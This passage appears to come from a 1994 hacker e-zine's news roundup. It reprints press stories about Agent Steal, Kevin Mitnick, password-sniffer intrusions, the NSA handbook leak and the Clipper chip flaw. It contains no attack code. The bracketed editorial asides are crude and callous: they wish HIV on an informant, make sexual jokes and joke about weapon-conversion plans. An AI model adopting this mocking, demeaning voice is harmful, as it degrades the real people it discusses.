brown hair - "sometimes platinum blond." But his most telling
characteristic is that he walks with the aid of a prosthesis
because he lost his left leg below the knee in a car accident.
Heavily involved in the Hollywood music scene, Petersen's
last known employer was Club "Velvet Jam," one of a string of
clubs he promoted in Los Angeles.
-----------------------------------------------------------------------------
Hacker in Hiding July 31, 1994
~~~~~~~~~~~~~~~~
by John Johnson (LA Times)
First there was the Condor, then Dark Dante. The latest computer hacker to
hit the cyberspace most wanted list is Agent Steal, a slender, good-looking
rogue partial to Porsches and BMWs who bragged that he worked undercover
for the FBI catching other hackers.
Now Agent Steal, whose real name is Justin Tanner Petersen, is on the run
from the very agency he told friends was paying his rent and flying him to
computer conferences to spy on other hackers.
Petersen, 34, disappeared Oct. 18 after admitting to federal prosecutors
that he had been committing further crimes during the time when he was
apparently working with the government "in the investigation of other
persons," according to federal court records.
Ironically, by running he has consigned himself to the same secretive life
as Kevin Mitnick, the former North Hills man who is one of the nation's most
infamous hackers, and whom Petersen allegedly bragged of helping to set up
for an FBI bust. Mitnick, who once took the name Condor in homage to a
favorite movie character, has been hiding for almost two years to avoid
prosecution for allegedly hacking into computers illegally and posing as a
law enforcement officer.
Authorities say Petersen's list of hacks includes breaking into computers
used by federal investigative agencies and tapping into a credit card
information bureau. Petersen, who once promoted after-hours rock shows in
the San Fernando Valley, also was involved in the hacker underground's most
sensational scam - hijacking radio station phone lines to win contests with
prizes ranging from new cars to trips to Hawaii.
Petersen gave an interview last year to an on-line publication called Phrack
in which he claimed to have tapped the phone of a prostitute working for
Heidi Fleiss. He also boasted openly of working with the FBI to bust
Mitnick.
"When I went to work for the bureau I contacted him," Petersen said in the
interview conducted by Mike Bowen. "He was still up to his old tricks, so
we opened a case on him. . . . What a loser. Everyone thinks he is some
great hacker. I outsmarted him and busted him."
In the Phrack interview, published on the Internet, an international network
of computer networks with millions of users, Agent Steal bragged about
breaking into Pacific Bell headquarters with Poulsen to obtain information
about the phone company's investigation of his hacking.
Petersen was arrested in Texas in 1991, where he lived briefly. Court
records show that authorities searching his apartment found computer
equipment, Pacific Bell manuals and five modems.
A grand jury in Texas returned an eight-count indictment against Petersen,
accusing him of assuming false names, accessing a computer without
authorization, possessing stolen mail and fraudulently obtaining and using
credit cards.
The case was later transferred to California and sealed, out of concern for
Petersen's safety, authorities said. The motion to seal, obtained by
Sherman, states that Petersen, "acting in an undercover capacity, currently
is cooperating with the United States in the investigation of other persons
in California."
In the Phrack interview, Petersen makes no apologies for his choices in life.
While discussing Petersen's role as an informant, Mike Bowen says, "I think
that most hackers would have done the same as you."
"Most hackers would have sold out their mother," Petersen responded.
------------------------------------------------------------------------------
Computer Criminal Caught After 10 Months on the Run August 30, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Keith Stone (Daily News)
Convicted computer criminal Justin Tanner Petersen was captured Monday in
Los Angeles, 10 months after federal authorities said they discovered he
had begun living a dual life as their informant and an outlaw hacker.
Petersen, 34, was arrested about 3:30 a.m. outside a Westwood apartment
that FBI agents had placed under surveillance, said Assistant U.S.
Attorney David Schindler.
A flamboyant hacker known in the computer world as "Agent Steal," Petersen
was being held without bail in the federal detention center in Los Angeles.
U.S. District Court Judge Stephen V. Wilson scheduled a sentencing hearing
for Oct. 31.
Petersen faces a maximum of 40 years in prison for using his sophisticated
computer skills to rig a radio contest in Los Angeles, tap telephone lines
and enrich himself with credit cards.
Monday's arrest ends Petersen's run from the same FBI agents with whom he
had once struck a deal: to remain free on bond in exchange for pleading
guilty to several computer crimes and helping the FBI with other hacker
cases.
The one-time nightclub promoter pleaded guilty in April 1993 to six federal
charges. And he agreed to help the government build its case against Kevin
Lee Poulsen, who was convicted of manipulating telephones to win radio
contests and is awaiting trial on espionage charges in San Francisco.
Authorities said they later learned that Petersen had violated the deal by
committing new crimes even as he was awaiting sentencing in the plea
agreement.
On Monday, FBI agents acting on a tip were waiting for Petersen when he parked
a BMW at the Westwood apartment building. An FBI agent called Petersen's
name, and Petersen began to run, Schindler said.
Two FBI agents gave chase and quickly caught Petersen, who has a prosthetic
lower left leg because of a car-motorcycle accident several years ago.
In April 1993, Petersen pleaded guilty to six federal charges including
conspiracy, computer fraud, intercepting wire communications, transporting
a stolen vehicle across state lines and wrongfully accessing TRW credit
files. Among the crimes that Petersen has admitted to was working with other
people to seize control of telephone lines so they could win radio
promotional contests. In 1989, Petersen used that trick and walked away with
$10,000 in prize money from an FM station, court records show.
When that and other misdeeds began to catch up with him, Petersen said, he
fled to Dallas, where he assumed the alias Samuel Grossman and continued
using computers to make money illegally.
When he as finally arrested in 1991, Petersen played his last card.
"I called up the FBI and said: 'Guess what? I am in jail,' " he said.
He said he spent the next four months in prison, negotiating for his freedom
with the promise that he would act as an informant in Los Angeles.
The FBI paid his rent and utilities and gave him $200 a week for spending
money and medical insurance, Petersen said.
They also provided him with a computer and phone lines to gather information
on hackers, he said.
Eventually, Petersen said, the FBI stopped supporting him so he turned to
his nightclubs for income. But when that began to fail, he returned to
hacking for profit.
"I was stuck out on a limb. I was almost out on the street. My club
was costing me money because it was a new club," he said. "So I did what
I had to do. I an not a greedy person."
[Broke, Busted, Distrusted. Turning in your friends leads to some
seriously bad Karma, man. Negative energy like that returns ten-fold.
You never know in what form either. You could end getting shot,
thrown in jail, or worse, test HIV Positive. So many titty-dancers,
so little time, eh dude? Good luck and God bless ya' Justin.]
-----------------------------------------------------------------------------
Fugitive Hacker Baffles FBI With Technical Guile July 5, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by John Markoff (New York Times)
[Mitnik, Mitnik, Mitnik, and more Mitnik. Poor bastard. No rest for
the wicked, eh Kevin?]
-----------------------------------------------------------------------------
Computer Outlaws Invade the Internet May 24, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Mike Toner (Atlanta Journal-Constitution)
A nationwide wave of computer break-ins has law enforcement
authorities scrambling to track down a sophisticated ring of
"hackers" who have used the international "information
highway," the Internet, to steal more than 100,000 passwords -- the
electronic keys to vast quantities of information stored on
government, university and corporate computer systems.
Since the discovery of an isolated break-in last year at a
single computer that provides a "gateway" to the Internet,
operators of at least 30 major computer systems have found illicit
password "sniffers" on their machines.
The Federal Bureau of Investigation has been investigating the
so-called "sniffer" attacks since February, but security experts
say the intrusions are continuing -- spurred, in part, by the
publication last month of line-by-line instructions for the
offending software in an on-line magazine for hackers.
Computer security experts say the recent rash of password piracy
using the Internet is much more serious than earlier security
violations, like the electronic "worm" unleashed in 1988 by
Cornell University graduate student Robert Morris.
"This is a major concern for the whole country," she says.
"I've had some sleepless nights just thinking about what could
happen. It's scary. Once someone has your ID and your password,
they can read everything you own, erase it or shut a system down.
They can steal proprietary information and sell it, and you might
not even know it's gone."
"Society has shifted in the last few years from just using
computers in business to being absolutely dependent on them and the
information they give us -- and the bad guys are beginning to
appreciate the value of information," says Dain Gary, manager of
the Computer Emergency Response Team (CERT), a crack team of
software experts at Carnegie-Mellon University in Pittsburgh that
is supported by the Defense Department's Advanced Research Projects
Agency.
Gary says the current rash of Internet crime appears to be the
work of a "loosely knit but fairly organized group" of computer
hackers adept not only at breaking and entering, but at hiding
their presence once they're in.
Most of the recent break-ins follow a similar pattern. The
intruders gain access to a computer system by locating a weakness
in its security system -- what software experts call an "unpatched
vulnerability."
Once inside, the intruders install a network monitoring program,
a "sniffer," that captures and stores the first 128 keystrokes
of all newly opened accounts, which almost always includes a user's
log-on and password.
"We really got concerned when we discovered that the code had
been published in Phrack, an on-line magazine for hackers, on April
1," he says. "Putting something like that in Phrack is a little
like publishing the instructions for converting semiautomatic
weapons into automatics.
Even more disturbing to security experts is the absence of a
foolproof defense. CERT has been working with computer system
administrators around the country to shore up electronic security,
but the team concedes that such "patches" are far from perfect.
[Look for plans on converting semiautomatic weapons into automatics
in the next issue.]
------------------------------------------------------------------------------
Information Superhighwaymen - Hacker Menace Persists May 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Open Computing) (Page 25)
Once again the Internet has been labeled a security problem. And a new
breed of hackers has attracted attention for breaking into systems.
"This is a group of people copying what has been done for years," says
Chris Goggans, aka Erik Bloodaxe. "There's one difference: They don't
play nice."
Goggans was a member of the hacker gang called the Legion of Doom in the
late '80s to early '90s. Goggans says the new hacking group, which goes
by the name of "The Posse," has broken into numerous Business Week 1000
companies including Sun Microsystems Inc., Boeing, and Xerox. He says
they've logged onto hundreds of universities and online services like
The Well. And they're getting root access on all these systems.
For their part, The Posse--a loose band of hackers--isn't talking.
------------------------------------------------------------------------------
Security Experts: Computer Hackers a Growing Concern July 22, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
New York Times News Wire (Virginian-Pilot and Ledger Star) (2A)
Armed with increasing sophisticated snooping tools, computer programmers
operating both in the United States and abroad have gained unauthorized
access to hundreds of sensitive but unclassified government and military
computer networks called Internet, computer security experts said.
Classified government and military data, such as those that control
nuclear weapons, intelligence and other critical functions, are not
connected to the Internet and are believed to be safe from the types of
attacks reported recently.
The apparent ease with which hackers are entering military and government
systems suggests that similar if not greater intrusions are under way on
corporate, academic and commercial networks connected to the Internet.
Several sources said it was likely that only a small percentage of
intrusions, perhaps fewer than 5 percent, have been detected.
------------------------------------------------------------------------------
NSA Semi-confidential Rules Circulate
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Keay Davidson (San Francisco Examiner) (Page A1)
It arrived mysteriously at an Austin, Texas, post office box by "snail
mail" - computerese for the Postal Service. But once the National Security
Agency's employee handbook was translated into bits and bytes, it took
only minutes to circulate across the country.
Thus did a computer hacker in Texas display his disdain for government
secrecy last week - by feeding into public computer networks the
semiconfidential document, which describes an agency that, during the darkest
days of the Cold War, didn't officially "exist."
Now, anyone with a computer, telephone, modem and basic computer skills
can read the 36-page manual, which is stamped "FOR OFFICIAL USE ONLY" and
offers a glimpse of the shadowy world of U.S. intelligence - and the personal
price its inhabitants pay.
"Your home, car pool, and public places are not authorized areas to
conduct classified discussions - even if everyone involved in the discussion
possesses a proper clearance and "need-to-know.' The possibility that a
conversation could be overheard by unauthorized persons dictates the need to
guard against classified discussions in non-secure areas."
The manual is "so anal retentive and paranoid. This gives you some
insight into how they think," said Chris Goggans, the Austin hacker who
unleashed it on the computer world. His on-line nom de plume is "Erik
Bloodaxe" because "when I was about 11, I read a book on Vikings, and that
name really struck me."
NSA spokeswoman Judi Emmel said Tuesday that "apparently this document is
an (NSA) employee handbook, and it is not classified." Rather, it is an
official NSA employee manual and falls into a twilight zone of secrecy. On
one hand, it's "unclassified." On the other hand, it's "FOR OFFICIAL USE
ONLY" and can be obtained only by filing a formal request under the U.S.
Freedom of Information Act, Emmel said.
"While you may take this handbook home for further study, remember that
it does contain "FOR OFFICIAL USE ONLY' information which should be
protected," the manual warns. Unauthorized release of such information could
result in "appropriate administrative action ... (and) corrective and/or
disciplinary measures."
Goggans, 25, runs an on-line electronic "magazine" for computer hackers
called Phrack, which caters to what he calls the "computer underground." He
is also a computer engineer at an Austin firm, which he refuses to name.
The manual recently arrived at Goggans' post office box in a white
envelope with no return address, save a postmark from a Silicon Valley
location, he says. Convinced it was authentic, he typed it into his computer,
then copied it into the latest issue of Phrack.
Other hackers, like Grady Ward of Arcata, Humboldt County, and Jeff
Leroy Davis of Laramie, Wyo., redistributed the electronic files to computer
users' groups. These included one run by the Cambridge, Mass.-based
Electronic Frontier Foundation, which fights to protect free speech on
computer networks.
Ward said he helped redistribute the NSA manual "to embarrass the NSA"
and prove that even the U.S. government's most covert agency can't keep
documents secret.
The action also was aimed at undermining a federal push for
data-encryption regulations that would let the government tap into computer
networks, Ward said.
[Yeah...sure it was, Grady.]
------------------------------------------------------------------------------
Hackers Stored Pornography in Computers at Weapons Lab July 13, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Adam S. Bauman (Virginian-Pilot and Ledger-Star) (Page A6)
One of the nation's three nuclear weapons labs has confirmed that
computer hackers were using its computers to store and distribute
hard-core pornography.
The offending computer, which was shut down after a Los Angeles Times
reporter investigating Internet hacking alerted lab officials, contained
more than 1,000 pornographic images. It was believed to be the largest
cache of illegal hardcore pornography ever found on a computer network.
At Lawrence Livermore, officials said Monday that they believed at least
one lab employee was involved in the pornography ring, along with an
undetermined number of outside collaborators.
[Uh, let me see if I can give this one a go:
A horny lab technician at LLNL.GOV uudecoded gifs for days on end
from a.b.p.e. After putting them up on an FSP site, a nosey schlock
reporter blew the whistle, and wrote up a big "hacker-scare" article.
The top-notch CIAC team kicked the horn-dog out the door, and began
frantically scouring the big Sun network at LLNL for other breaches,
all the while scratching their heads at how to block UDP-based apps
like FSP at their firewall. MPEGs at 11.
How does shit like this get printed????]
------------------------------------------------------------------------------
Clipper Flaw May Thwart Fed Effort June 6, 1994
by Aaron Zitner (Boston Globe)
Patents, Technical Snares May Trip Up the 'Clipper' June 6, 1994
by Sharon Fisher (Communications Week) (Page 1)
[Clipper, Flipper, Slipper. It's all a big mess, and has obsoleted
itself. But, let's sum up the big news:
How the Clipper technology is SUPPOSED to work
1) Before an encoded message can be sent, a clipper computer chip
assigns and tests a scrambled group of numbers called a LEAF, for
Law Enforcement Access Field. The LEAF includes the chip's serial
number, a "session key" number that locks the message and a "checksum"
number that verifies the validity of the session key.
2) With a warrant to wiretap, a law-enforcement agency like the FBI
could record the message and identify the serial number of a Clipper
chip. It would then retrieve from custodial agencies the two halves of
that chip's decoding key.
3) Using both halves of the decoding key, the FBI would be able to
unscramble the session key number, thus unlocking the messages or data
that had been protected.
How the Clipper technology is FLAWED (YAY, Matt Blaze!)
1) Taking advantage of design imperfections, people trying to defeat
the system could replace the LEAF until it erroneously passed the
"checksum" verification, despite an invalid session-key number.
2) The FBI would still be able to retrieve a decoding key, but it would
prove useless.
3) Because the decoding key would not be able to unscramble the invalid
session key, the message would remain locked.]
Reference in New Issue Copy Permalink